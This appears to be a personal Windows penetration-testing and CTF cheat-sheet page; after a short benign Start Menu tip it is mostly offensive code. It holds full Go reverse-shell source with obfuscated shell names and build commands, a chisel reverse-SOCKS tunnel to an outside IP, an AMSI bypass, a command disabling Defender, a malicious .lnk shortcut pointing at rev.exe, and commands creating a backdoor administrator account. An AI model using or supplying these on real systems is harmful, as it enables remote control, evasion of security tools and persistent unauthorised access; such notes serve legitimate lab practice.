Windows

Add Program To Search Bar

  1. Go to the folder your program is installed in, right click, select Send to > Desktop (Create shortcut)

  2. Click Win+R and enter %ProgramData%\Microsoft\Windows\Start Menu to open the Start Menu folder in Windows Explorer

  3. Move your new shortcut from the desktop to the Start Menu folder

  4. If desired select the moved shortcut and press F2 to rename and remove the - Shortcut text

src

Cronjobs

Start the job

Start-Job -ScriptBlock { & "./program.exe"; }

Start-Job -ScriptBlock { & "./chisel.exe" client 10.10.14.43:36000 R:socks; }

$job = Start-Job -ScriptBlock {
    & "./chisel.exe" client 10.10.14.43:36000 R:socks
}

Check the status of the job

Get-Job

Get-Job $id

Get-Job $job

Get the output of the job

Receive-Job

Receive-Job -Keep $id

Receive-Job -Keep $job

Stop the job if needed

Stop-Job

Stop-Job $id

Stop-Job $job

Remove the job from the job list

Remove-Job

Remove-Job $id

Remove-Job $job

Enable Web Dav

Source: HOW TO START A “TRIGGER START” WINDOWS SERVICE WITH POWERSHELL WITHOUT ELEVATION / ADMIN RIGHTS

$Source = @"
using System;
using System.Text;
using System.Security;
using System.Collections.Generic;
using System.Runtime.Versioning;
using Microsoft.Win32.SafeHandles;
using System.Runtime.InteropServices;
using System.Diagnostics.CodeAnalysis;
namespace JosL.WebClient {
  public static class Starter {
    [StructLayout(LayoutKind.Explicit, Size = 16)]
    public class EVENT_DESCRIPTOR {
      [FieldOffset(0)] ushort Id = 1;
      [FieldOffset(2)] byte Version = 0;
      [FieldOffset(3)] byte Channel = 0;
      [FieldOffset(4)] byte Level = 4;
      [FieldOffset(5)] byte Opcode = 0;
      [FieldOffset(6)] ushort Task = 0;
      [FieldOffset(8)] long Keyword = 0;
    }

    [StructLayout(LayoutKind.Explicit, Size = 16)]
    public struct EventData {
      [FieldOffset(0)]
      internal UInt64 DataPointer;
      [FieldOffset(8)]
      internal uint Size;
      [FieldOffset(12)]
      internal int Reserved;
    }

    public static void startService() {
      Guid webClientTrigger = new Guid(0x22B6D684, 0xFA63, 0x4578, 0x87, 0xC9, 0xEF, 0xFC, 0xBE, 0x66, 0x43, 0xC7);

      long handle = 0;
      uint output = EventRegister(ref webClientTrigger, IntPtr.Zero, IntPtr.Zero, ref handle);

      bool success = false;

      if (output == 0) {
        EVENT_DESCRIPTOR desc = new EVENT_DESCRIPTOR();
        unsafe {
          uint writeOutput = EventWrite(handle, ref desc, 0, null);
          success = writeOutput == 0;
          EventUnregister(handle);
        }
      }
    }

    [DllImport("Advapi32.dll", SetLastError = true)]
    public static extern uint EventRegister(ref Guid guid, [Optional] IntPtr EnableCallback, [Optional] IntPtr CallbackContext, [In][Out] ref long RegHandle);

    [DllImport("Advapi32.dll", SetLastError = true)]
    public static extern unsafe uint EventWrite(long RegHandle, ref EVENT_DESCRIPTOR EventDescriptor, uint UserDataCount, EventData * UserData);

    [DllImport("Advapi32.dll", SetLastError = true)]
    public static extern uint EventUnregister(long RegHandle);
  }
}
"@
$compilerParameters = New-Object System.CodeDom.Compiler.CompilerParameters
$compilerParameters.CompilerOptions="/unsafe"
Add-Type -TypeDefinition $Source -Language CSharp -CompilerParameters $compilerParameters
[JosL.WebClient.Starter]::startService()

Golang Reverse Shell

Author

Repo: https://github.com/gwillgues/Reverse-Shells.gitRevshell.go: https://github.com/gwillgues/Reverse-Shells/blob/main/revshell.go

Code

// Author: https://github.com/gwillgues/Reverse-Shells/blob/main/revshell.go
package main

import (
	"os/exec"
	"os"
	"net"
	"runtime"
)

func main() {
	dst := os.Args[1]
	pnum := os.Args[2]
	connstring := dst + ":" + pnum
	prot := "tcp"
	netData, _ := net.Dial(prot, connstring)
	os := runtime.GOOS
	shell := exec.Command("/b" + "in" + "/b" + "ash")
	switch os {
		case "windows": shell = exec.Command("pow" + "ers" + "hell" + "." +  "e" + "xe")
		case "linux":   shell = exec.Command("/" + "b" + "in/" + "bas" + "h")
		case "darwin":  exec.Command("/b" + "in" + "/z" + "s" + "h")
	}
	shell.Stdin = netData
	shell.Stdout = netData
	shell.Stderr = netData
	shell.Run()
}

Build

Build for Windows:

GOOS=windows GOARCH=amd64 go build -o rev.exe rev.go

Build for Linux:

go build -ldflags="-s -w" -o rev rev.go

Get product versions

PS C:\xampp\htdocs\internal> wmic product get caption,version # Took like a minute to complete...
Caption                                                         Version
Office 16 Click-to-Run Extensibility Component                  16.0.17126.20132
Office 16 Click-to-Run Licensing Component                      16.0.17126.20132
Microsoft Visual C++ 2022 X64 Minimum Runtime - 14.32.31332     14.32.31332
Microsoft Visual C++ 2022 X64 Additional Runtime - 14.32.31332  14.32.31332
LibreOffice 5.2.6.2                                             5.2.6.2
DefaultPackMSI                                                  4.6.2.0
VMware Tools                                                    12.0.6.20104755
...

Check if UAC is active

*Evil-WinRM* PS C:\Users\maya> reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System"

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
	...
	EnableLUA    REG_DWORD    0x1
	...

Watch File Changes

$directory = "C:\Common Applications"
$watcher = New-Object System.IO.FileSystemWatcher
$watcher.Path = $directory
$watcher.Filter = "*.lnk"
$watcher.IncludeSubdirectories = $true
$watcher.NotifyFilter = [System.IO.NotifyFilters]'FileName, LastAccess'
$accessLog = @{}
$action = {
    $filePath = $eventArgs.FullPath
    if ($accessLog.ContainsKey($filePath)) { $accessLog[$filePath]++ } else { $accessLog[$filePath] = 1 }
}
Register-ObjectEvent $watcher 'Changed' -Action $action
Register-ObjectEvent $watcher 'Created' -Action $action
Register-ObjectEvent $watcher 'Deleted' -Action $action
Register-ObjectEvent $watcher 'Renamed' -Action $action
$watcher.EnableRaisingEvents = $true
Write-Output "Monitoring .lnk file access in $directory for 2 minutes..."
Start-Sleep -Seconds 120
Write-Output "Total .lnk file accesses in 2 minutes:"
foreach ($file in $accessLog.Keys) {
    Write-Output "File: $file, Access Count: $($accessLog[$file])"
}
Unregister-Event -SourceIdentifier * -ErrorAction SilentlyContinue
$watcher.Dispose()

Create Shortcut (lnk)

$shortcutPath = "C:\Common Applications\Notepad.lnk"
$targetPath = "C:\Users\Public\rev.exe"
$wscript = New-Object -ComObject WScript.Shell
$shortcut = $wscript.CreateShortcut($shortcutPath)
$shortcut.TargetPath = $targetPath
$shortcut.Save()

Bypass AMSI

# Author: Axura  
# URL: https://4xura.com/ctf/htb-writeup-mist/#toc-head-4  
  
$a = [Ref].Assembly.GetTypes() | ?{$_.Name -like '*siUtils'} 
$b = $a.GetFields('NonPublic,Static') | ?{$_.Name -like '*siContext'} 
[IntPtr]$c = $b.GetValue($null) 
[Int32[]]$d = @(0xff) 
[System.Runtime.InteropServices.Marshal]::Copy($d, 0, $c, 1)

Disable Defender

Source: https://www.liberiangeek.net/2023/11/how-to-disable-windows-defender-using-powershell/

Set-MpPreference -DisableRealtimeMonitoring $true

Get flags (HTB)

ls $ENV:USERPROFILE -fil *.txt -rec | % { $_.FullName; echo " "; cat $_.FullName }

Create new admin user

net user <username> <password> /add
net localgroup administrators <username> /add
net localgroup "Remote Management Users" <username> /add

runas /user:<domain\username> "<command>"

net user letmein Password123$ /add && net localgroup administrators letmein /add && net localgroup "Remote Management Users" letmein /add
runas /user:letmein "whoami"
PreviousWebNextCTFs

Last updated